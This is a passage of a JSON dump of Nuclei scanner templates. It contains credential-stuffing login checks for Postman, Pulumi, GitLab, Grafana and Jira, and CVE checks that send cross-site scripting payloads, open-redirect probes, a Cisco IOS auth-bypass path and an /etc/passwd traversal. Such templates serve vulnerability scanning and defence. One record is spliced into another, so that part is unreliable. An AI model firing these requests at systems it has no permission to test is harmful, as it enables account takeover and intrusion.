\"status_code==302\"\n condition: and\n# digest: 490a00463044022032da6a74ed4e674bc4b66b66765724ee259c4df8ef05e9bc98de8ccc3f4ebfd202205a0376f01efcde43398c419330041e7fe45717e8ad8c3bf457c79739f730617a:922c64590222798bb761d5b6d8e72950", "hash": "0912eb21c4eeeafc330ca707f8acd486", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e30" }, "name": "postman-login-check.yaml", "content": "id: postman-login-check\n\ninfo:\n name: Postman Login Check\n author: parthmalhotra,pdresearch\n severity: critical\n description: Checks for a valid postman account.\n reference:\n - https://owasp.org/www-community/attacks/Credential_stuffing\n metadata:\n max-request: 2\n tags: cloud,creds-stuffing,login-check,postman\n\nself-contained: true\n\nhttp:\n - raw:\n - |\n GET 
https://identity.getpostman.com/login HTTP/1.1\n Host: identity.getpostman.com\n Referer: https://identity.getpostman.com/accounts\n - |\n POST https://identity.getpostman.com/login HTTP/1.1\n Host: identity.getpostman.com\n Content-Type: application/json;charset=UTF-8\n X-Csrf-Token: {{csrfToken}}\n Origin: https://identity.getpostman.com\n Referer: https://identity.getpostman.com/login\n\n {\"username\":\"{{username}}\",\"password\":\"{{password}}\"}\n\n attack: pitchfork\n\n extractors:\n - type: xpath\n name: csrfToken\n part: body\n attribute: value\n internal: true\n xpath:\n - /html/body/div/div/div[1]/form/input\n\n - type: dsl\n dsl:\n - username\n - password\n matchers:\n - type: dsl\n dsl:\n - \"contains(to_lower(header), 'set-cookie: getpostmanlogin=yes')\"\n - \"contains(to_lower(body), 'identity.postman.co/continue')\"\n - \"status_code==200\"\n condition: and\n# digest: 490a0046304402203e8ec08f17a12d6d7a2b85a1feaee01c10d0a6940e2d44329e6a2d37af063390022057aeeb47cc9661399ce85b26e148ebcde995d2e54975ec322d4edad4184bc9ac:922c64590222798bb761d5b6d8e72950", "hash": "2805cf1330a788b070cfaf6fb1c16a52", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e31" }, "name": "pulmi-login-check.yaml", "content": "id: pulmi-login-check\n\ninfo:\n name: pulmi.com Login Check\n author: parthmalhotra,pdresearch\n severity: critical\n description: Checks for a valid github account.\n reference:\n - https://owasp.org/www-community/attacks/Credential_stuffing\n metadata:\n max-request: 1\n tags: cloud,creds-stuffing,login-check,pulmi\n\nself-contained: true\n\nhttp:\n - raw:\n - |\n POST https://api.pulumi.com/api/console/email/login HTTP/1.1\n Host: api.pulumi.com\n Content-Type: application/json\n Origin: https://app.pulumi.com\n Referer: https://app.pulumi.com/\n\n {\"emailOrLogin\":\"{{username}}\",\"password\":\"{{password}}\"}\n\n extractors:\n - type: dsl\n dsl:\n - username\n - password\n\n matchers-condition: and\n matchers:\n - 
type: word\n part: body\n words:\n - pulumiAccessToken\n - userInfo\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402202cfeb85946995474986c795d6a8ad6bbd6c384973bcb4b7f392c275a5c898bf002205dd88d6ad113c4818b82b56baf67c624ff07f2f09875185ae066dd9af16560e0:922c64590222798bb761d5b6d8e72950", "hash": "078880fd00f5b6124c16aabfd528c1b0", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e32" }, "name": "gitlab-login-check-self-hosted.yaml", "content": "id: gitlab-login-check-self-hosted\n\ninfo:\n name: Gitlab Login Check Self Hosted\n author: parthmalhotra,pdresearch\n severity: critical\n description: Checks for a valid login on self hosted GitLab instance.\n reference:\n - https://owasp.org/www-community/attacks/Credential_stuffing\n metadata:\n max-request: 2\n shodan-query: product:\"GitLab Self-Managed\"\n fofa-query: product=\"GitLab\"\n tags: creds-stuffing,login-check,self-hosted,gitlab\nvariables:\n username: \"{{username}}\"\n password: \"{{password}}\"\n\nhttp:\n - raw:\n - |\n GET /users/sign_in HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /users/sign_in HTTP/1.1\n Host: {{Hostname}}\n Cache-Control: max-age=0\n Origin: {{BaseURL}}\n DNT: 1\n Content-Type: application/x-www-form-urlencoded\n Referer: {{BaseURL}}/users/sign_in\n Accept-Language: en-US,en;q=0.9,de;q=0.8\n\n authenticity_token={{url_encode(authenticity_token)}}&user%5Blogin%5D={{username}}&user%5Bpassword%5D={{password}}&user%5Bremember_me%5D=0\n\n attack: pitchfork\n\n extractors:\n - type: regex\n part: body\n internal: true\n name: authenticity_token\n group: 1\n regex:\n - '\"/users/sign_in\".*?authenticity_token\"\\s+value=\"([^\"]+)\"'\n\n - type: dsl\n dsl:\n - username\n - password\n matchers:\n - type: dsl\n dsl:\n - status_code_2 == 302\n - '!contains(to_lower(body_2), \"invalid login\")'\n condition: and\n# digest: 
4a0a004730450221009d296a685fb32afc2b238155a03f8f694a9309300972b3a5c437e04f21be3b2d022008d402c88300f6ff469a65c127a2966dcc346930bf46d0516df78c4bdbcdab72:922c64590222798bb761d5b6d8e72950", "hash": "9276f55635cec216d83a4b760b58e4a2", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e33" }, "name": "grafana-login-check.yaml", "content": "id: grafana-login-check\n\ninfo:\n name: Grafana Login Check\n author: parthmalhotra,pdresearch\n severity: critical\n description: Checks for a valid login on self hosted Grafana instance.\n reference:\n - https://owasp.org/www-community/attacks/Credential_stuffing\n metadata:\n max-request: 1\n shodan-query: title:\"Grafana\"\n fofa-query: title=\"Grafana\"\n tags: self-hosted,creds-stuffing,login-check,grafana\nvariables:\n username: \"{{username}}\"\n password: \"{{password}}\"\n\nhttp:\n - raw:\n - |\n POST /login HTTP/1.1\n Host: {{Hostname}}\n accept: application/json, text/plain, */*\n DNT: 1\n content-type: application/json\n Origin: {{BaseURL}}\n Referer: {{BaseURL}}/login\n Cookie: redirect_to=%2F\n\n {\"user\":\"{{username}}\",\"password\":\"{{password}}\"}\n\n extractors:\n - type: dsl\n dsl:\n - username\n - password\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'Logged in'\n\n - type: word\n part: header\n words:\n - 'grafana_session'\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100a3f034e7179bdf079b1dc2684546e0aed572c531bfde778a670188f30ca5394d022100b2af74dbd182c70308b657aa3c1481e2b815a5c98dc49d5471f66cd4d4ccf527:922c64590222798bb761d5b6d8e72950", "hash": "a7a70e40d09c8b380c827c0c5bc17c4d", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e34" }, "name": "jira-login-check.yaml", "content": "id: jira-login-check\n\ninfo:\n name: Jira Login Check\n author: parthmalhotra,pdresearch\n severity: critical\n description: Checks for a valid login on self hosted Jira instance.\n reference:\n - 
https://owasp.org/www-community/attacks/Credential_stuffing\n metadata:\n max-request: 1\n shodan-query: http.component:\"Atlassian Jira\"\n fofa-query: product=\"JIRA\"\n tags: creds-stuffing,login-check,self-hosted,jira\nvariables:\n username: \"{{username}}\"\n password: \"{{password}}\"\n\nhttp:\n - raw:\n - |\n POST /rest/gadget/1.0/login HTTP/1.1\n Host: {{Hostname}}\n User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n Connection: close\n\n os_username={{username}}&os_password={{password}}\n\n extractors:\n - type: dsl\n dsl:\n - username\n - password\n attack: pitchfork\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"loginSucceeded\":true'\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100f8ccb2fa2c256c05034ec98bcbf0ffa455795dfc04126caff69c12c4ab24c8df022100874e434186b1f2974afe1caa1e13566b68c1efa5be27faa471186b1bc1fd8c91:922c64590222798bb761d5b6d8e72950", "hash": "63e257486d0fd1062272251759e6985a", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e35" }, "name": "CVE-2000-0114.yaml", "content": "id: CVE-2000-0114\n\ninfo:\n name: Microsoft FrontPage Extensions Check (shtml.dll)\n author: r3naissance\n severity: medium\n description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory.\n impact: |\n Information disclosure only: an unauthenticated attacker learns the name of the anonymous account the server handles requests under, which aids password guessing and further targeting of that account. The CVSS vector (C:P/I:N/A:N) carries no integrity or availability impact, so this is not remote code execution or denial of service. Note that this template only confirms FrontPage Server Extensions are exposed by reading _vti_inf.html; it does not issue the shtml.dll RPC request itself.\n remediation: Remove or disable FrontPage Server Extensions where they are not required, or restrict access to the /_vti_bin/ virtual directory; otherwise apply the vendor fix.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2000-0114\n - https://www.exploit-db.com/exploits/19897\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/CVE-2000-0114\n - https://github.com/0xPugazh/One-Liners\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: 
CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2000-0114\n cwe-id: NVD-CWE-Other\n epss-score: 0.15958\n epss-percentile: 0.95829\n cpe: cpe:2.3:a:microsoft:internet_information_server:3.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: microsoft\n product: internet_information_server\n tags: cve,cve2000,frontpage,microsoft,edb\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/_vti_inf.html'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"_vti_bin/shtml.dll\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100f18bd6804b42bce98cc02cea3261854e17f9d58bcb7034e2dc7289c456c57c0d022100d91840b613c0b2544a15e2ae802e176fea630dee4788fe64c5e40f9082bc1374:922c64590222798bb761d5b6d8e72950", "hash": "4ed87f7b064417908a2204daa9323565", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e36" }, "name": "CVE-2001-0537.yaml", "content": "id: CVE-2001-0537\n\ninfo:\n name: Cisco IOS HTTP Configuration - Authentication Bypass\n author: DhiyaneshDK\n severity: critical\n description: |\n HTTP server for Cisco IOS 11.3 to 12.2 allows attackers to bypass authentication and execute arbitrary commands, when local authorization is being used, by specifying a high access level in the URL.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access to the affected device.\n remediation: |\n Apply the appropriate patch or upgrade to a fixed version of the Cisco IOS software.\n reference:\n - https://www.rapid7.com/db/modules/auxiliary/scanner/http/cisco_ios_auth_bypass/\n - https://nvd.nist.gov/vuln/detail/CVE-2001-0537\n - http://www.ciac.org/ciac/bulletins/l-106.shtml\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/6749\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:C/I:C/A:C\n cvss-score: 9.3\n cve-id: CVE-2001-0537\n cwe-id: CWE-287\n epss-score: 0.87683\n epss-percentile: 0.98569\n cpe: 
cpe:2.3:o:cisco:ios:11.3:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: cisco\n product: ios\n shodan-query: product:\"Cisco IOS http config\" && 200\n tags: cve,cve2001,cisco,ios,auth-bypass\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/level/16/exec/show/config/CR'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'service config'\n - 'Switch'\n - 'default-gateway'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502201530427f983f1ac47d92a3e00fb141fab33efd4f9ac109b29beca3488669ca5b022100e7ab1cc3fec5da235092a57848d0f83403d81bff12d5ed347ee7d6442b19444c:922c64590222798bb761d5b6d8e72950", "hash": "1c93b2a65d7c03cd6e020d052f54fb74", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e37" }, "name": "CVE-2002-1131.yaml", "content": "id: CVE-2002-1131\n\ninfo:\n name: SquirrelMail 1.2.6/1.2.7 - Cross-Site Scripting\n author: dhiyaneshDk\n severity: high\n description: The Virtual Keyboard plugin for SquirrelMail 1.2.6/1.2.7 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or other malicious activities.\n remediation: |\n Upgrade to a patched version of SquirrelMail or apply the necessary security patches to mitigate the XSS vulnerability.\n reference:\n - http://www.redhat.com/support/errata/RHSA-2002-204.html\n - http://www.debian.org/security/2002/dsa-191\n - http://sourceforge.net/project/shownotes.php?group_id=311&release_id=110774\n - https://www.exploit-db.com/exploits/21811\n - https://nvd.nist.gov/vuln/detail/CVE-2002-1131\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2002-1131\n cwe-id: CWE-80\n epss-score: 0.06018\n 
epss-percentile: 0.92781\n cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:*\n metadata:\n max-request: 5\n vendor: squirrelmail\n product: squirrelmail\n tags: cve,cve2002,edb,xss,squirrelmail\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n - '{{BaseURL}}/src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n - '{{BaseURL}}/src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search'\n - '{{BaseURL}}/src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search'\n - '{{BaseURL}}/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502200f73612464ffbb40fb37890f6902c59fd670a8c57eb10a297b6ce6d7d7a68301022100a8ed74ff2523575fbbdb8d5a4a330d69c6a96ef8d97d911a20c1468dfa92aa2e:922c64590222798bb761d5b6d8e72950", "hash": "1c21a7c8d038bac341aae77547addc3e", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e38" }, "name": "CVE-2004-0519.yaml", "content": "id: CVE-2004-0519\n\ninfo:\n name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting\n author: dhiyaneshDk\n severity: medium\n description: Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to 
session hijacking, phishing attacks, or defacement of the SquirrelMail interface.\n remediation: Upgrade to the latest version.\n reference:\n - https://www.exploit-db.com/exploits/24068\n - http://security.gentoo.org/glsa/glsa-200405-16.xml\n - ftp://patches.sgi.com/support/free/security/advisories/20040604-01-U.asc\n - http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000858\n - http://marc.info/?l=bugtraq&m=108334862800260\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2004-0519\n cwe-id: NVD-CWE-Other\n epss-score: 0.02285\n epss-percentile: 0.89406\n cpe: cpe:2.3:a:sgi:propack:3.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: sgi\n product: propack\n tags: cve,cve2004,squirrelmail,edb,xss,sgi\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a004830460221009dd2f6f1f47f6884512787786f2340268b3b43d1f115d5b41a670c3f29f42c4d022100dd3b55ba93d169763824f63a0016a520e29f80044dd7087a2d1122f4b3617c19:922c64590222798bb761d5b6d8e72950", "hash": "3ce5e009ca0307a4fb76ea128dc60006", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e39" }, "name": "CVE-2004-1965.yaml", "content": "id: CVE-2004-1965\n\ninfo:\n name: Open Bulletin Board (OpenBB) v1.0.6 - Open Redirect/XSS\n author: ctflearner\n severity: medium\n description: |\n Multiple cross-site scripting (XSS) vulnerabilities in Open Bulletin Board (OpenBB) 1.0.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) redirect parameter to member.php, (2) to parameter to myhome.php (3) TID parameter to post.php, or (4) redirect parameter to index.php.\n impact: |\n Successful exploitation of these 
vulnerabilities could lead to unauthorized access, phishing attacks, and potential data theft.\n remediation: |\n Upgrade to a patched version of Open Bulletin Board (OpenBB) or apply necessary security patches to mitigate the vulnerabilities.\n reference:\n - https://www.exploit-db.com/exploits/24055\n - https://nvd.nist.gov/vuln/detail/CVE-2004-1965\n - http://marc.info/?l=bugtraq&m=108301983206107&w=2\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/15966\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2004-1965\n cwe-id: NVD-CWE-Other\n epss-score: 0.0113\n epss-percentile: 0.84351\n cpe: cpe:2.3:a:openbb:openbb:1.0.0_beta1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: openbb\n product: openbb\n tags: cve,cve2004,redirect,xss,openbb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?redirect=http%3A%2F%2Fwww.interact.sh\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$'\n# digest: 4a0a0047304502200942a34b2650323617b6c0a05aed0e60c5452d3b77477cfa2760dd51678d7371022100cf0d486cba6f8042c311e7cc3134723dd8e8b86ff44b5cdb22e0adbfe3ba3776:922c64590222798bb761d5b6d8e72950", "hash": "62f265d7498fd425287846bd2df715a2", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e3a" }, "name": "CVE-2005-2428.yaml", "content": "id: CVE-2005-2428\n\ninfo:\n name: Lotus Domino R5 and R6 WebMail - Information Disclosure\n author: CasperGN\n severity: medium\n description: Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled (which is by default) allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different 
vulnerability than CVE-2005-2696).\n impact: |\n The vulnerability can lead to the disclosure of sensitive information, potentially compromising user privacy and system security.\n remediation: Ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files.\n reference:\n - http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf\n - https://www.exploit-db.com/exploits/39495\n - https://nvd.nist.gov/vuln/detail/CVE-2005-2428\n - http://marc.info/?l=bugtraq&m=112240869130356&w=2\n - http://securitytracker.com/id?1014584\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2005-2428\n cwe-id: CWE-200\n epss-score: 0.01188\n epss-percentile: 0.83623\n cpe: cpe:2.3:a:ibm:lotus_domino:5.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: ibm\n product: lotus_domino\n tags: cve2005,cve,domino,edb,ibm\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/names.nsf/People?OpenView\"\n\n matchers-condition: and\n matchers:\n - type: regex\n name: domino-username\n part: body\n regex:\n - '(Horde :: User Administration\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402200f6ab7e5b811ae50b7feb5a05fd7996c735219dbe8a152b9c4cfd263af7405d6022054184a20298d9717f3c6263e0ca1083caa2941df71af109b0f69013ab683cec8:922c64590222798bb761d5b6d8e72950", "hash": "362cd755a3cd20ca5992e52189b4c65c", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e3c" }, "name": "CVE-2005-3634.yaml", "content": "id: CVE-2005-3634\n\ninfo:\n name: SAP Web Application Server 6.x/7.0 - Open Redirect\n author: ctflearner\n severity: medium\n description: |\n frameset.htm in the BSP runtime in SAP Web Application Server (WAS) 6.10 through 7.00 allows remote attackers to log users out and redirect them to arbitrary web sites via a close command in the sap-sessioncmd parameter and a URL in the sap-exiturl 
parameter.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks.\n remediation: |\n Apply the latest security patches and updates provided by SAP to fix the open redirect vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/26488\n - https://cxsecurity.com/issue/WLB-2005110025\n - https://marc.info/?l=bugtraq&m=113156525006667&w=2\n - http://www.cybsec.com/vuln/CYBSEC_Security_Advisory_Multiple_XSS_in_SAP_WAS.pdf\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/23031\n - https://nvd.nist.gov/vuln/detail/CVE-2005-3634\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:N/I:P/A:N\n cvss-score: 5\n cve-id: CVE-2005-3634\n cwe-id: NVD-CWE-Other\n epss-score: 0.02843\n epss-percentile: 0.897\n cpe: cpe:2.3:a:sap:sap_web_application_server:6.10:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: sap\n product: sap_web_application_server\n shodan-query: html:\"SAP Business Server Pages Team\"\n tags: cve,cve2005,sap,redirect,business,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/sap/bc/BSp/sap/menu/fameset.htm?sap--essioncmd=close&sapexiturl=https%3a%2f%2finteract.sh\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$'\n# digest: 4b0a004830460221009b702e9a18c644f2a8ddd637cd2d87e35e59ec9159e4726e5b9dbf6cbe27ddcc022100e7fd499cc594ceab440e9188af24fd6eaa6f1eab4514609586796ae41b96b43f:922c64590222798bb761d5b6d8e72950", "hash": "8443892e8813df23568e2b56db924001", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e3d" }, "name": "CVE-2005-4385.yaml", "content": "id: CVE-2005-4385\n\ninfo:\n name: Cofax <=2.0RC3 - Cross-Site Scripting\n author: geeknik\n severity: medium\n description: Cofax 2.0 RC3 and earlier contains a cross-site scripting vulnerability in search.htm which allows remote 
attackers to inject arbitrary web script or HTML via the searchstring parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a version of Cofax that is not affected by this vulnerability or apply the necessary patches provided by the vendor.\n reference:\n - http://pridels0.blogspot.com/2005/12/cofax-xss-vuln.html\n - https://nvd.nist.gov/vuln/detail/CVE-2005-4385\n - http://www.vupen.com/english/advisories/2005/2977\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2005-4385\n cwe-id: NVD-CWE-Other\n epss-score: 0.00294\n epss-percentile: 0.68633\n cpe: cpe:2.3:a:cofax:cofax:1.9.9c:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cofax\n product: cofax\n tags: cve2005,cve,cofax,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/search.htm?searchstring2=&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"'>\\\"\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100ce759080f0a66542cb9e9ef838c4eec1bfc1ff9f685db0a5e1b5288ec69daa6202210098c3b44c36f631ea8314785ec5f8b01f320897dbb8fbfe5549601f5dfa1cfaaf:922c64590222798bb761d5b6d8e72950", "hash": "0d5342deb78fe5d5f4ec1dbf8371beab", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e3e" }, "name": "CVE-2006-1681.yaml", "content": "id: CVE-2006-1681\n\ninfo:\n name: Cherokee HTTPD <=0.5 - Cross-Site Scripting\n author: geeknik\n severity: medium\n description: Cherokee HTTPD 0.5 and earlier contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via a malformed 
request that generates an HTTP 400 error, which is not properly handled when the error message is generated.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of Cherokee HTTPD or apply the necessary security patches to mitigate the XSS vulnerability.\n reference:\n - http://www.vupen.com/english/advisories/2006/1292\n - https://nvd.nist.gov/vuln/detail/CVE-2006-1681\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/25698\n - https://security.gentoo.org/glsa/202012-09\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2006-1681\n cwe-id: NVD-CWE-Other\n epss-score: 0.01015\n epss-percentile: 0.82067\n cpe: cpe:2.3:a:cherokee:cherokee_httpd:0.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cherokee\n product: cherokee_httpd\n tags: cve,cve2006,cherokee,httpd,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402206000675250836d41143110814a2779c38b107e4a265562dd0b63d3cbbd788faf02207e8b57e4d85550b1daf5c2e4a1d4640d9347d24ba23c9e16b1bb2a75c722089e:922c64590222798bb761d5b6d8e72950", "hash": "99d18576ff2cf915555e5fb196b237a5", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e3f" }, "name": "CVE-2006-2842.yaml", "content": "id: CVE-2006-2842\n\ninfo:\n name: Squirrelmail <=1.4.6 - Local File Inclusion\n author: dhiyaneshDk\n severity: high\n description: SquirrelMail 1.4.6 and earlier versions are susceptible to a PHP local file inclusion vulnerability in 
functions/plugin.php if register_globals is enabled and magic_quotes_gpc is disabled. This allows remote attackers to include arbitrary files, and thereby execute arbitrary PHP code, via the plugins array parameter. This template only checks the local-file variant (a traversal to /etc/passwd with a trailing %00 intended to truncate the include path), so it additionally depends on a PHP runtime that still honours null bytes in include paths; a negative result does not rule out the remote-URL variant.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Upgrade Squirrelmail to a version higher than 1.4.6 or apply the necessary patches to fix the LFI vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/27948\n - http://squirrelmail.cvs.sourceforge.net/squirrelmail/squirrelmail/functions/global.php?r1=1.27.2.16&r2=1.27.2.17&view=patch&pathrev=SM-1_4-STABLE\n - http://www.squirrelmail.org/security/issue/2006-06-01\n - https://nvd.nist.gov/vuln/detail/CVE-2006-2842\n - ftp://patches.sgi.com/support/free/security/advisories/20060703-01-U.asc\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2006-2842\n cwe-id: CWE-22\n epss-score: 0.25691\n epss-percentile: 0.9628\n cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: squirrelmail\n product: squirrelmail\n tags: cve,cve2006,lfi,squirrelmail,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/src/redirect.php?plugins[]=../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402204e83bd6e716c336c1660d900f8c08653ace9865180909e88dc35b6180af0634d02205959ac5c89fa3aa04db1f64a614848f8a84c0604fe7f72bad1f63b1c99d8404b:922c64590222798bb761d5b6d8e72950", "hash": "1e9d62593827e580a90d6472ddcfea6a", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e40" }, "name": "CVE-2007-0885.yaml", "content": "id: CVE-2007-0885\n\ninfo:\n name: Jira Rainbow.Zen - Cross-Site Scripting\n author: geeknik\n severity: medium\n description: Jira Rainbow.Zen contains a 
